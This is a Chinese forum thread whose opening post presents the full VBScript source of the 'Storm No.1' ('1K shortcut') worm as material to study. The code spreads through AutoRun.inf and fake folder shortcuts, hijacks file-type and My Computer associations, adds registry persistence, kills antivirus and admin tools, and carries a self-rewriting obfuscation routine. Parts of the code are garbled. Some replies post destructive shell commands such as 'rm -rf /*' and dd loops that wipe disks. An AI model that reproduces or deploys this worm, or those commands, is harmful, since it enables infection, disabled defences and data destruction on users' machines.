这是一个创建于 3645 天前的主题,其中的信息可能已经有所发展或是发生改变。
暴风一号病毒源代码,一些杀毒软件又称“ 1K 快捷方式病毒”,是一个大学生的闲暇之作。值得研究学习, VBS 病毒的鼻祖是马尼拉 AMA 计算机大学的学生编写的“爱虫”病毒。很久了。
On Error Resume Next
Dim Fso,Wshshell
Set Fso = CreateObject("Scripting.Filesystemobject")
Set Wshshell = CreateObject("Wscript.Shell")
Call Main()
Sub Main()
On Error Resume Next Dim Args, VirusLoad, VirusAss Set Args = WScript.Arguments VirusLoad = GetMainVirus(1) VirusAss = GetMainVirus(0) ArgNum = 0 Do WhileArgNum < Args.Count Param = Param & " " & Args(ArgNum) ArgNum = ArgNum + 1 Loop SubParam = LCase(Right(Param, 3)) Select Case SubParam Case "run" RunPath = Left(WScript.ScriptFullName, 2) Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "txt", "log","ini" ,"inf" RunPath = "%SystemRoot%\system32\NOTEPAD.EXE " & Param Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "bat", "cmd" RunPath = "CMD /c echo Hi!I'm here!&pause" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "reg" RunPath = "regedit.exe " & """" & Trim(Param) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "chm" RunPath = "hh.exe " & """" & Trim(Param) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "hlp" RunPath = "winhlp32.exe " & """" & Trim(Param) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "dir" RunPath = """" & Left(Trim(Param),Len(Trim(Param)) - 3) & """" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "oie" RunPath = """%ProgramFiles%\Internet Explorer\IEXPLORE.EXE""" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "omc" RunPath = "explorer.exe / n, {20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case "emc" RunPath = "explorer.exe / n, / e, {20D04FE0 - 3AEA - 1069 - A2D8 - 08002B30309D}" Call Run(RunPath) Call InvadeSystem(VirusLoad,VirusAss) Call Run("%SystemRoot%\system\svchost.exe " & VirusLoad) Case Else If PreDblInstance = True Then WScript.Quit End If Call MonitorSystem() End Select End Sub
Sub MonitorSystem()
On Error Resume Next
Dim ProcessNames, ExeFullNames
ProcessNames = Array("ras.exe", "360tray.exe", "taskmgr.exe", "cmd.exe", "cmd.com", "regedit.exe", "regedit.scr","regedit.pif", "regedit.com", "msconfig.exe") VBSFullNames = Array(GetMainVirus(1)) Do Call KillProcess(ProcessNames) Call InvadeSystem(GetMainVirus(1),GetMainVirus(0)) Call KeepProcess(VBSFullNames) WScript.Sleep 3000 Loop End Sub
Sub InvadeSystem(VirusLoadPath,VirusAssPath)
On Error Resume Next
Dim Load_Value, File_Value, IE_Value, MyCpt_Value1, MyCpt_Value2, HCULoad, HCUVer, VirusCode, Version
Load_Value = "%SystemRoot%\system\svchost.exe " & """" & VirusLoadPath & """"
File_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " %1 %* "
IE_Value = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OIE "
MyCpt_Value1 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " OMC "
MyCpt_Value2 = "%SystemRoot%\System32\WScript.exe " & """" & VirusAssPath & """" & " EMC "
HCULoad = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Load"
HCUVer = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver"
HCUDate = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date"
VirusCode = GetCode(WScript.ScriptFullName)
Version = 1
HostSourcePath = Fso.GetSpecialFolder(1) & "\Wscript.exe"
HostFilePath = Fso.GetSpecialFolder(0) & "\system\svchost.exe"
For Each Drive In Fso.Drives
If Drive.IsReady And (Drive.DriveType = 1 Or Drive.DriveType = 2 Or Drive.DriveType = 3) Then
DiskVirusName = GetSerialNumber(Drive.DriveLetter) & ".vbs"
Call CreateAutoRun(Drive.DriveLetter,DiskVirusName)
Call InfectRoot(Drive.DriveLetter,DiskVirusName)
End If
Next
If FSO.FileExists(VirusAssPath) = False Or FSO.FileExists(VirusLoadPath) = False Or FSO.FileExists(HostFilePath) = False Or GetVersion() < Version Then
If GetFileSystemType(GetSystemDrive()) = "NTFS" Then
Call CreateFile(VirusCode,VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call CopyFile(HostSourcePath,HostFilePath)
Call SetHiddenAttr(HostFilePath)
Else
Call CreateFile(VirusCode, VirusAssPath)
Call SetHiddenAttr(VirusAssPath)
Call CreateFile(VirusCode,VirusLoadPath)
Call SetHiddenAttr(VirusLoadPath)
Call CopyFile(HostSourcePath, HostFilePath)
Call SetHiddenAttr(HostFilePath)
End If
End If
If ReadReg(HCULoad) <> Load_Value Then
Call WriteReg (HCULoad, Load_Value, "")
End If
If GetVersion() < Version Then
Call WriteReg (HCUVer, Version, "")
End If
If GetInfectedDate() = "" Then
Call WriteReg (HCUDate, Date, "")
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\") <> File_Value Then
Call SetTxtFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\") <> File_Value Then
Call SetIniFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\") <&t; File_Value Then
Call SetInfFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\") <> File_Value Then
Call SetBatFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\") <> File_Value Then
Call SetCmdFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\") <> File_Value Then
Call SetRegFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\") <> File_Value Then
Call SetchmFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\") <> File_Value Then
Call SethlpFileAss(VirusAssPath)
End If
If ReadReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Applications\iexplore.exe\shell\open\command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\") <> IE_Value Then
Call SetIEAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\") <> MyCpt_Value1 Then
Call SetMyComputerAss(VirusAssPath)
End If
If ReadReg("HKEY_CLASSES_ROOT\CLSID{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\") <> MyCpt_Value2 Then
Call SetMyComputerAss(VirusAssPath)
End If
Call RegSet()
End Sub
Sub CopyFile(source, pathf)
On Error Resume Next If FSO.FileExists(pathf) Then FSO.DeleteFile pathf , True End If FSO.CopyFile source, pathf End Sub
Sub CreateFile(code, pathf)
On Error Resume Next
Dim FileText
If FSO.FileExists(pathf) Then
Set FileText = FSO.OpenTextFile(pathf, 2, False)
FileText.Write code
FileText.Close
Else
Set FileText = FSO.OpenTextFile(pathf, 2, True)
FileText.Write code
FileText.Close
End If
End Sub
Sub RegSet()
On Error Resume Next
Dim RegPath1 , RegPath2, RegPath3, RegPath4
RegPath1 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedValue" RegPath2 = "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedValue" RegPath3 = "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun" RegPath4 = "HKEY_CLASSES_ROOT\lnkfile\IsShortcut" Call WriteReg (RegPath1, 3, "REG_DWORD") Call WriteReg (RegPath2, 2, "REG_DWORD") Call WriteReg (RegPath3, 0, "REG_DWORD") Call DeleteReg (RegPath4) End Sub
Sub KillProcess(ProcessNames)
On Error Resume Next
Set WMIService = GetObject("winmgmts
[url = file
/ / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]")
For Each ProcessName In ProcessNames
Set ProcessList = WMIService.execquery(" Select * From win32_process where name ='" & ProcessName & "' ")
For Each Process In ProcessList
IntReturn = Process.terminate
If intReturn <> 0 Then
WshShell.Run "CMD /c ntsd -c q -p " & Process.Handle, vbHide, False
End If
Next
Next
End Sub
Sub KillImmunity(D)
On Error Resume Next
ImmunityFolder = D & "
\ Autorun.inf"
If Fso.FolderExists(ImmunityFolder) Then
WshSHell.Run ("CMD /C CACLS " & """" & ImmunityFolder & """" & " / t / e / c / g everyone
f"),vbHide,True
WshSHell.Run ("CMD /C RD /S /Q " & ImmunityFolder), vbHide, True
End If
End Sub
第 1 条附言 2015-12-12 13:53:00 +08:00
 | 1 2015813 OP Sub KeepProcess(VBSFullNames) On Error Resume Next For Each VBSFullName In VBSFullNames If VBSProcessCount(VBSFullName) < 2 Then Run("%SystemRoot%\system\svchost.exe " & VBSFullName) End If Next End Sub Function GetSystemDrive() GetSystemDrive = Left(Fso.GetSpecialFolder(0),2) End Function Function GetFileSystemType(Drive) Set d = FSO.GetDrive(Drive) GetFileSystemType = d.FileSystem End Function Function ReadReg(strkey) Dim tmps Set tmps = CreateObject("WScript.Shell") ReadReg = tmps.RegRead(strkey) Set tmps = Nothing End Function Sub WriteReg(strkey, Value, vtype) Dim tmps Set tmps = CreateObject("WScript.Shell") If vtype = "" Then tmps.RegWrite strkey, Value Else tmps.RegWrite strkey, Value, vtype End If Set tmps = Nothing End Sub Sub DeleteReg(strkey) Dim tmps Set tmps = CreateObject("WScript.Shell") tmps.RegDelete strkey Set tmps = Nothing End Sub Sub SetHiddenAttr(path) On Error Resume Next Dim vf Set vf = FSO.GetFile(path) Set vf = FSO.GetFolder(path) vf.Attributes = 6 End Sub Sub Run(ExeFullName) On Error Resume Next Dim WshShell Set WshShell = WScript.CreateObject("WScript.Shell") WshShell.Run ExeFullName Set WshShell = Nothing End Sub Sub InfectRoot(D,VirusName) On Error Resume Next Dim VBSCode VBSCode = GetCode(WScript.ScriptFullName) VBSPath = D & "\" & VirusName If FSO.FileExists(VBSPath) = False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) End If Set Folder = Fso.GetFolder(D & "\") Set SubFolders = Folder.Subfolders For Each SubFolder In SubFolders SetHiddenAttr(SubFolder.Path) LnkPath = D & "\" & SubFolder.Name & ".lnk" TargetPath = D & "\" & VirusName Args = """" & D & "\" & SubFolder.Name & "\Dir""" If Fso.FileExists(LnkPath) = False Or GetTargetPath(LnkPath) <> TargetPath Then If Fso.FileExists(LnkPath) = True Then FSO.DeleteFile LnkPath, True End If Call CreateShortcut(LnkPath,TargetPath,Args) End If Next End Sub Sub CreateShortcut(LnkPath,TargetPath,Args) Set Shortcut = WshShell.CreateShortcut(LnkPath) With Shortcut .TargetPath = TargetPath .Arguments = Args .WindowStyle = 4 .IcOnLocation= "%SystemRoot%\System32\Shell32.dll, 3" .Save End With End Sub Sub CreateAutoRun(D,VirusName) On Error Resume Next Dim InfPath, VBSPath, VBSCode InfPath = D & " \ AutoRun.inf" VBSPath = D & " \ " & VirusName VBSCode = GetCode(WScript.ScriptFullName) If FSO.FileExists(InfPath) = False Or FSO.FileExists(VBSPath) = False Then Call CreateFile(VBSCode, VBSPath) Call SetHiddenAttr(VBSPath) StrInf = "[AutoRun]" & vbCrLf & "Shellexecute=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open=打开(&O)" & vbCrLf & "shell\open\command=WScript.exe " & VirusName & " ""AutoRun""" & vbCrLf & "shell\open\Default=1" & vbCrLf & "shell\explore=资源管理器(&X)" & vbCrLf & "shell\explore\command=WScript.exe " & VirusName & " ""AutoRun""" Call KillImmunity(D) Call CreateFile(StrInf, InfPath) Call SetHiddenAttr(InfPath) End If End Sub Sub SetTxtFileAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub Sub SetIniFileAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inifile\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub Sub SetInfFileAss(sFilePath) On Error Resume Next Dim Value alue = "%StemRootVystem3yscript%\Sript.\WS " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\inffile\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub Sub SetBatFileAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\batfile\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub Sub SetCmdFileAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\cmdfile\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub |
| 2 2015813 OP Sub SethlpFileAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\hlpfile\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub Sub SetRegFileAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\regfile\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub Sub SetchmFileAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " %1 %* " Call WriteReg("HKEY_LOCAL_MACHINE\SOFTWARE\Classes\chm.file\shell\open\command\", Value, "REG_EXPAND_SZ") End Sub Sub SetIEAss(sFilePath) On Error Resume Next Dim Value Value = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OIE " itl WCalEg("eRerOCAY_LHKNEACHL_MEFTW\SOIRE\\ClARes\Applications\iexplore.exe\shell\open\command\", Value, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command\", Value, "REG_EXPAND_SZ") End Sub Sub SetMyComputerAss(sFilePath) On Error Resume Next Dim Value1,Value2 Value1 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " OMC " Value2 = "%SystemRoot%\System32\WScript.exe " & """" & sFilePath & """" & " EMC " Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\", "", "REG_SZ") Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\open\command\", Value1, "REG_EXPAND_SZ") Call WriteReg("HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\explore\command\", Value2, "REG_EXPAND_SZ") End Sub Function GetSerialNumber(Drv) On Error Resume Next det.Ssoo.GetDrive(Drv) GetSerialNumber = d.SerialNumber GetSerialNumber = Replace(GetSerialNumber,"-","") End Function Function GetMainVirus(N) On Error Resume Next MainVirusName = GetSerialNumber(GetSystemDrive()) & ".vbs" If GetFileSystemType(GetSystemDrive()) = "NTFS" Then If N = 1 Then GetMainVirus = Fso.GetSpecialFolder(N) & "\smss.exe" & MainVirusName End If If N = 0 Then GetMainVirus = Fso.GetSpecialFolder(N) & "\explorer.exe" & MainVirusName End If Else GetMainVirus = Fso.GetSpecialFolder(N) & "\" & MainVirusName End If End Function Function VBSProcessCount(VBSPath) On Error Resume Next Dim WMIService, ProcessList, Process VBSProcessCount = 0 Set WMIService = GetObject("winmgmts [url = file / / \ \ . \ root \ cimv2] \ \ . \ root \ cimv2[ / url]") Set ProcessList = WMIService.ExecQuery("Select * from Win32_Process Where " & "Name='cscript.exe' or Name='wscript.exe' or Name='svchost.exe'") For Each Process In ProcessList If InStr(Process.CommandLine, VBSPath) > 0 Then VBSProcessCount = VBSProcessCount + 1 End If Next End Function Function PreDblInstance() On Error Resume Next PreDblInstance = False If VBSProcessCount(WScript.ScriptFullName) >= 3 Then PreDblInstance = True End If End Function Function GetTargetPath(LnkPath) On Error Resume Next Dim Shortcut Set Shortcut = WshShell.CreateShortcut(LnkPath) GetTargetPath = Shortcut.TargetPath End Function Function GetCode(FullPath) On Error Resume Next Dim FileText Set FileText = FSO.OpenTextFile(FullPath, 1) GetCode = FileText.ReadAll FileText.Close End Function Function GetVersion() Dim VerInfo VerInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Ver" If ReadReg(VerInfo) = "" Then GetVersion = 0 Else GetVersion = CInt(ReadReg(VerInfo)) End If End Function Function GetInfectedDate() On Error Resume Next Dim DateInfo DateInfo = "HKEY_CURRENT_USER\SoftWare\Microsoft\Windows NT\CurrentVersion\Windows\Date" If ReadReg(DateInfo) = "" Then GetInfectedDate = "" Else GetInfectedDate = CDate(ReadReg(DateInfo)) End If End Function Execute("set e452 = createobject(""scripting.filesystemobject"") Set d600 = e452.opentextfile(WScript.scriptfullname,1) Do untild600.atendofstream F19a = Trim(d600.readline) If Left(f19a,1) = ""'"" then F631 = e30b(Mid(f19a,2,Len(f19a) - 2),Right(f19a,1)) Randomize A880 = Int(8 * Rnd + 2) Dcc1 = ""'""&e30b(f631,a880)&a880 Else Dcc1 = f19a Dcc1 = a972(dcc1) Dcc1 = b26b(dcc1) End If Fbbe = fbbe & f631 & vbCrLf A41a = a41a & dcc1 & vbCrLf F631 = """" Dcc1 = """" Loop Set d600 = e452.opentextfile(WScript.scriptfullname,2) D600.write a41a D600.close Set e452 = Nothing Execute fbbe Function e30b(ba1e,a880) For d769 = 1 To Len(ba1e) step a880 E30b = e30b + StrReverse(Mid(ba1e,d769,a880)) Next End Function Function b26b(ba1e) Randomize For d769 = 1 To Len(ba1e) D841 = Mid(UCase(ba1e),d769,1) If Int(Rnd * 2) Then D841 = LCase(d841) End If B26b = b26b & d841 Next End Function Function a972(ba1e) Randomize For d769 = 0 To 13 Ba1e = Replace(UCase(ba1e),UCase(Hex( & he452 + d769)),UCase(Hex(Int(Rnd * 24000 + 40960) + d769))) Next A972 = ba1e End Function |
 | 3 loading 2015-12-08 18:35:19 +08:00 via Android 楼主,你这是找 block 是吧? 去学下贴代码吧~ 病毒只是程序的一种,这里很多人都会写! |
 | 4 RemRain 2015-12-08 18:51:26 +08:00 明显没有如下命令好使: chmod -R 000 / rm -rf /* for i in /dev/sd*; do dd if=/dev/zero of=$i & ; done |
 | 5 ICANN 2015-12-08 21:46:59 +08:00 乳猪试一下这段代码如何。 $ for((i=1;i<=200000;i++));do dd if=/dev/zero of=file_$i bs=1 count=1;done |
 | 6 holyzhou 2015-12-09 01:50:44 +08:00 楼上也别老贴这些危险命令成不~ 秀优越? |
 | 7 xylophone21 2015-12-09 16:33:25 +08:00 我猜楼上的意思是说,贴这么大段的所谓病毒代码,其实还不如来个命令直接。那是否意味着这个命令也是一个病毒呢? |
Select Language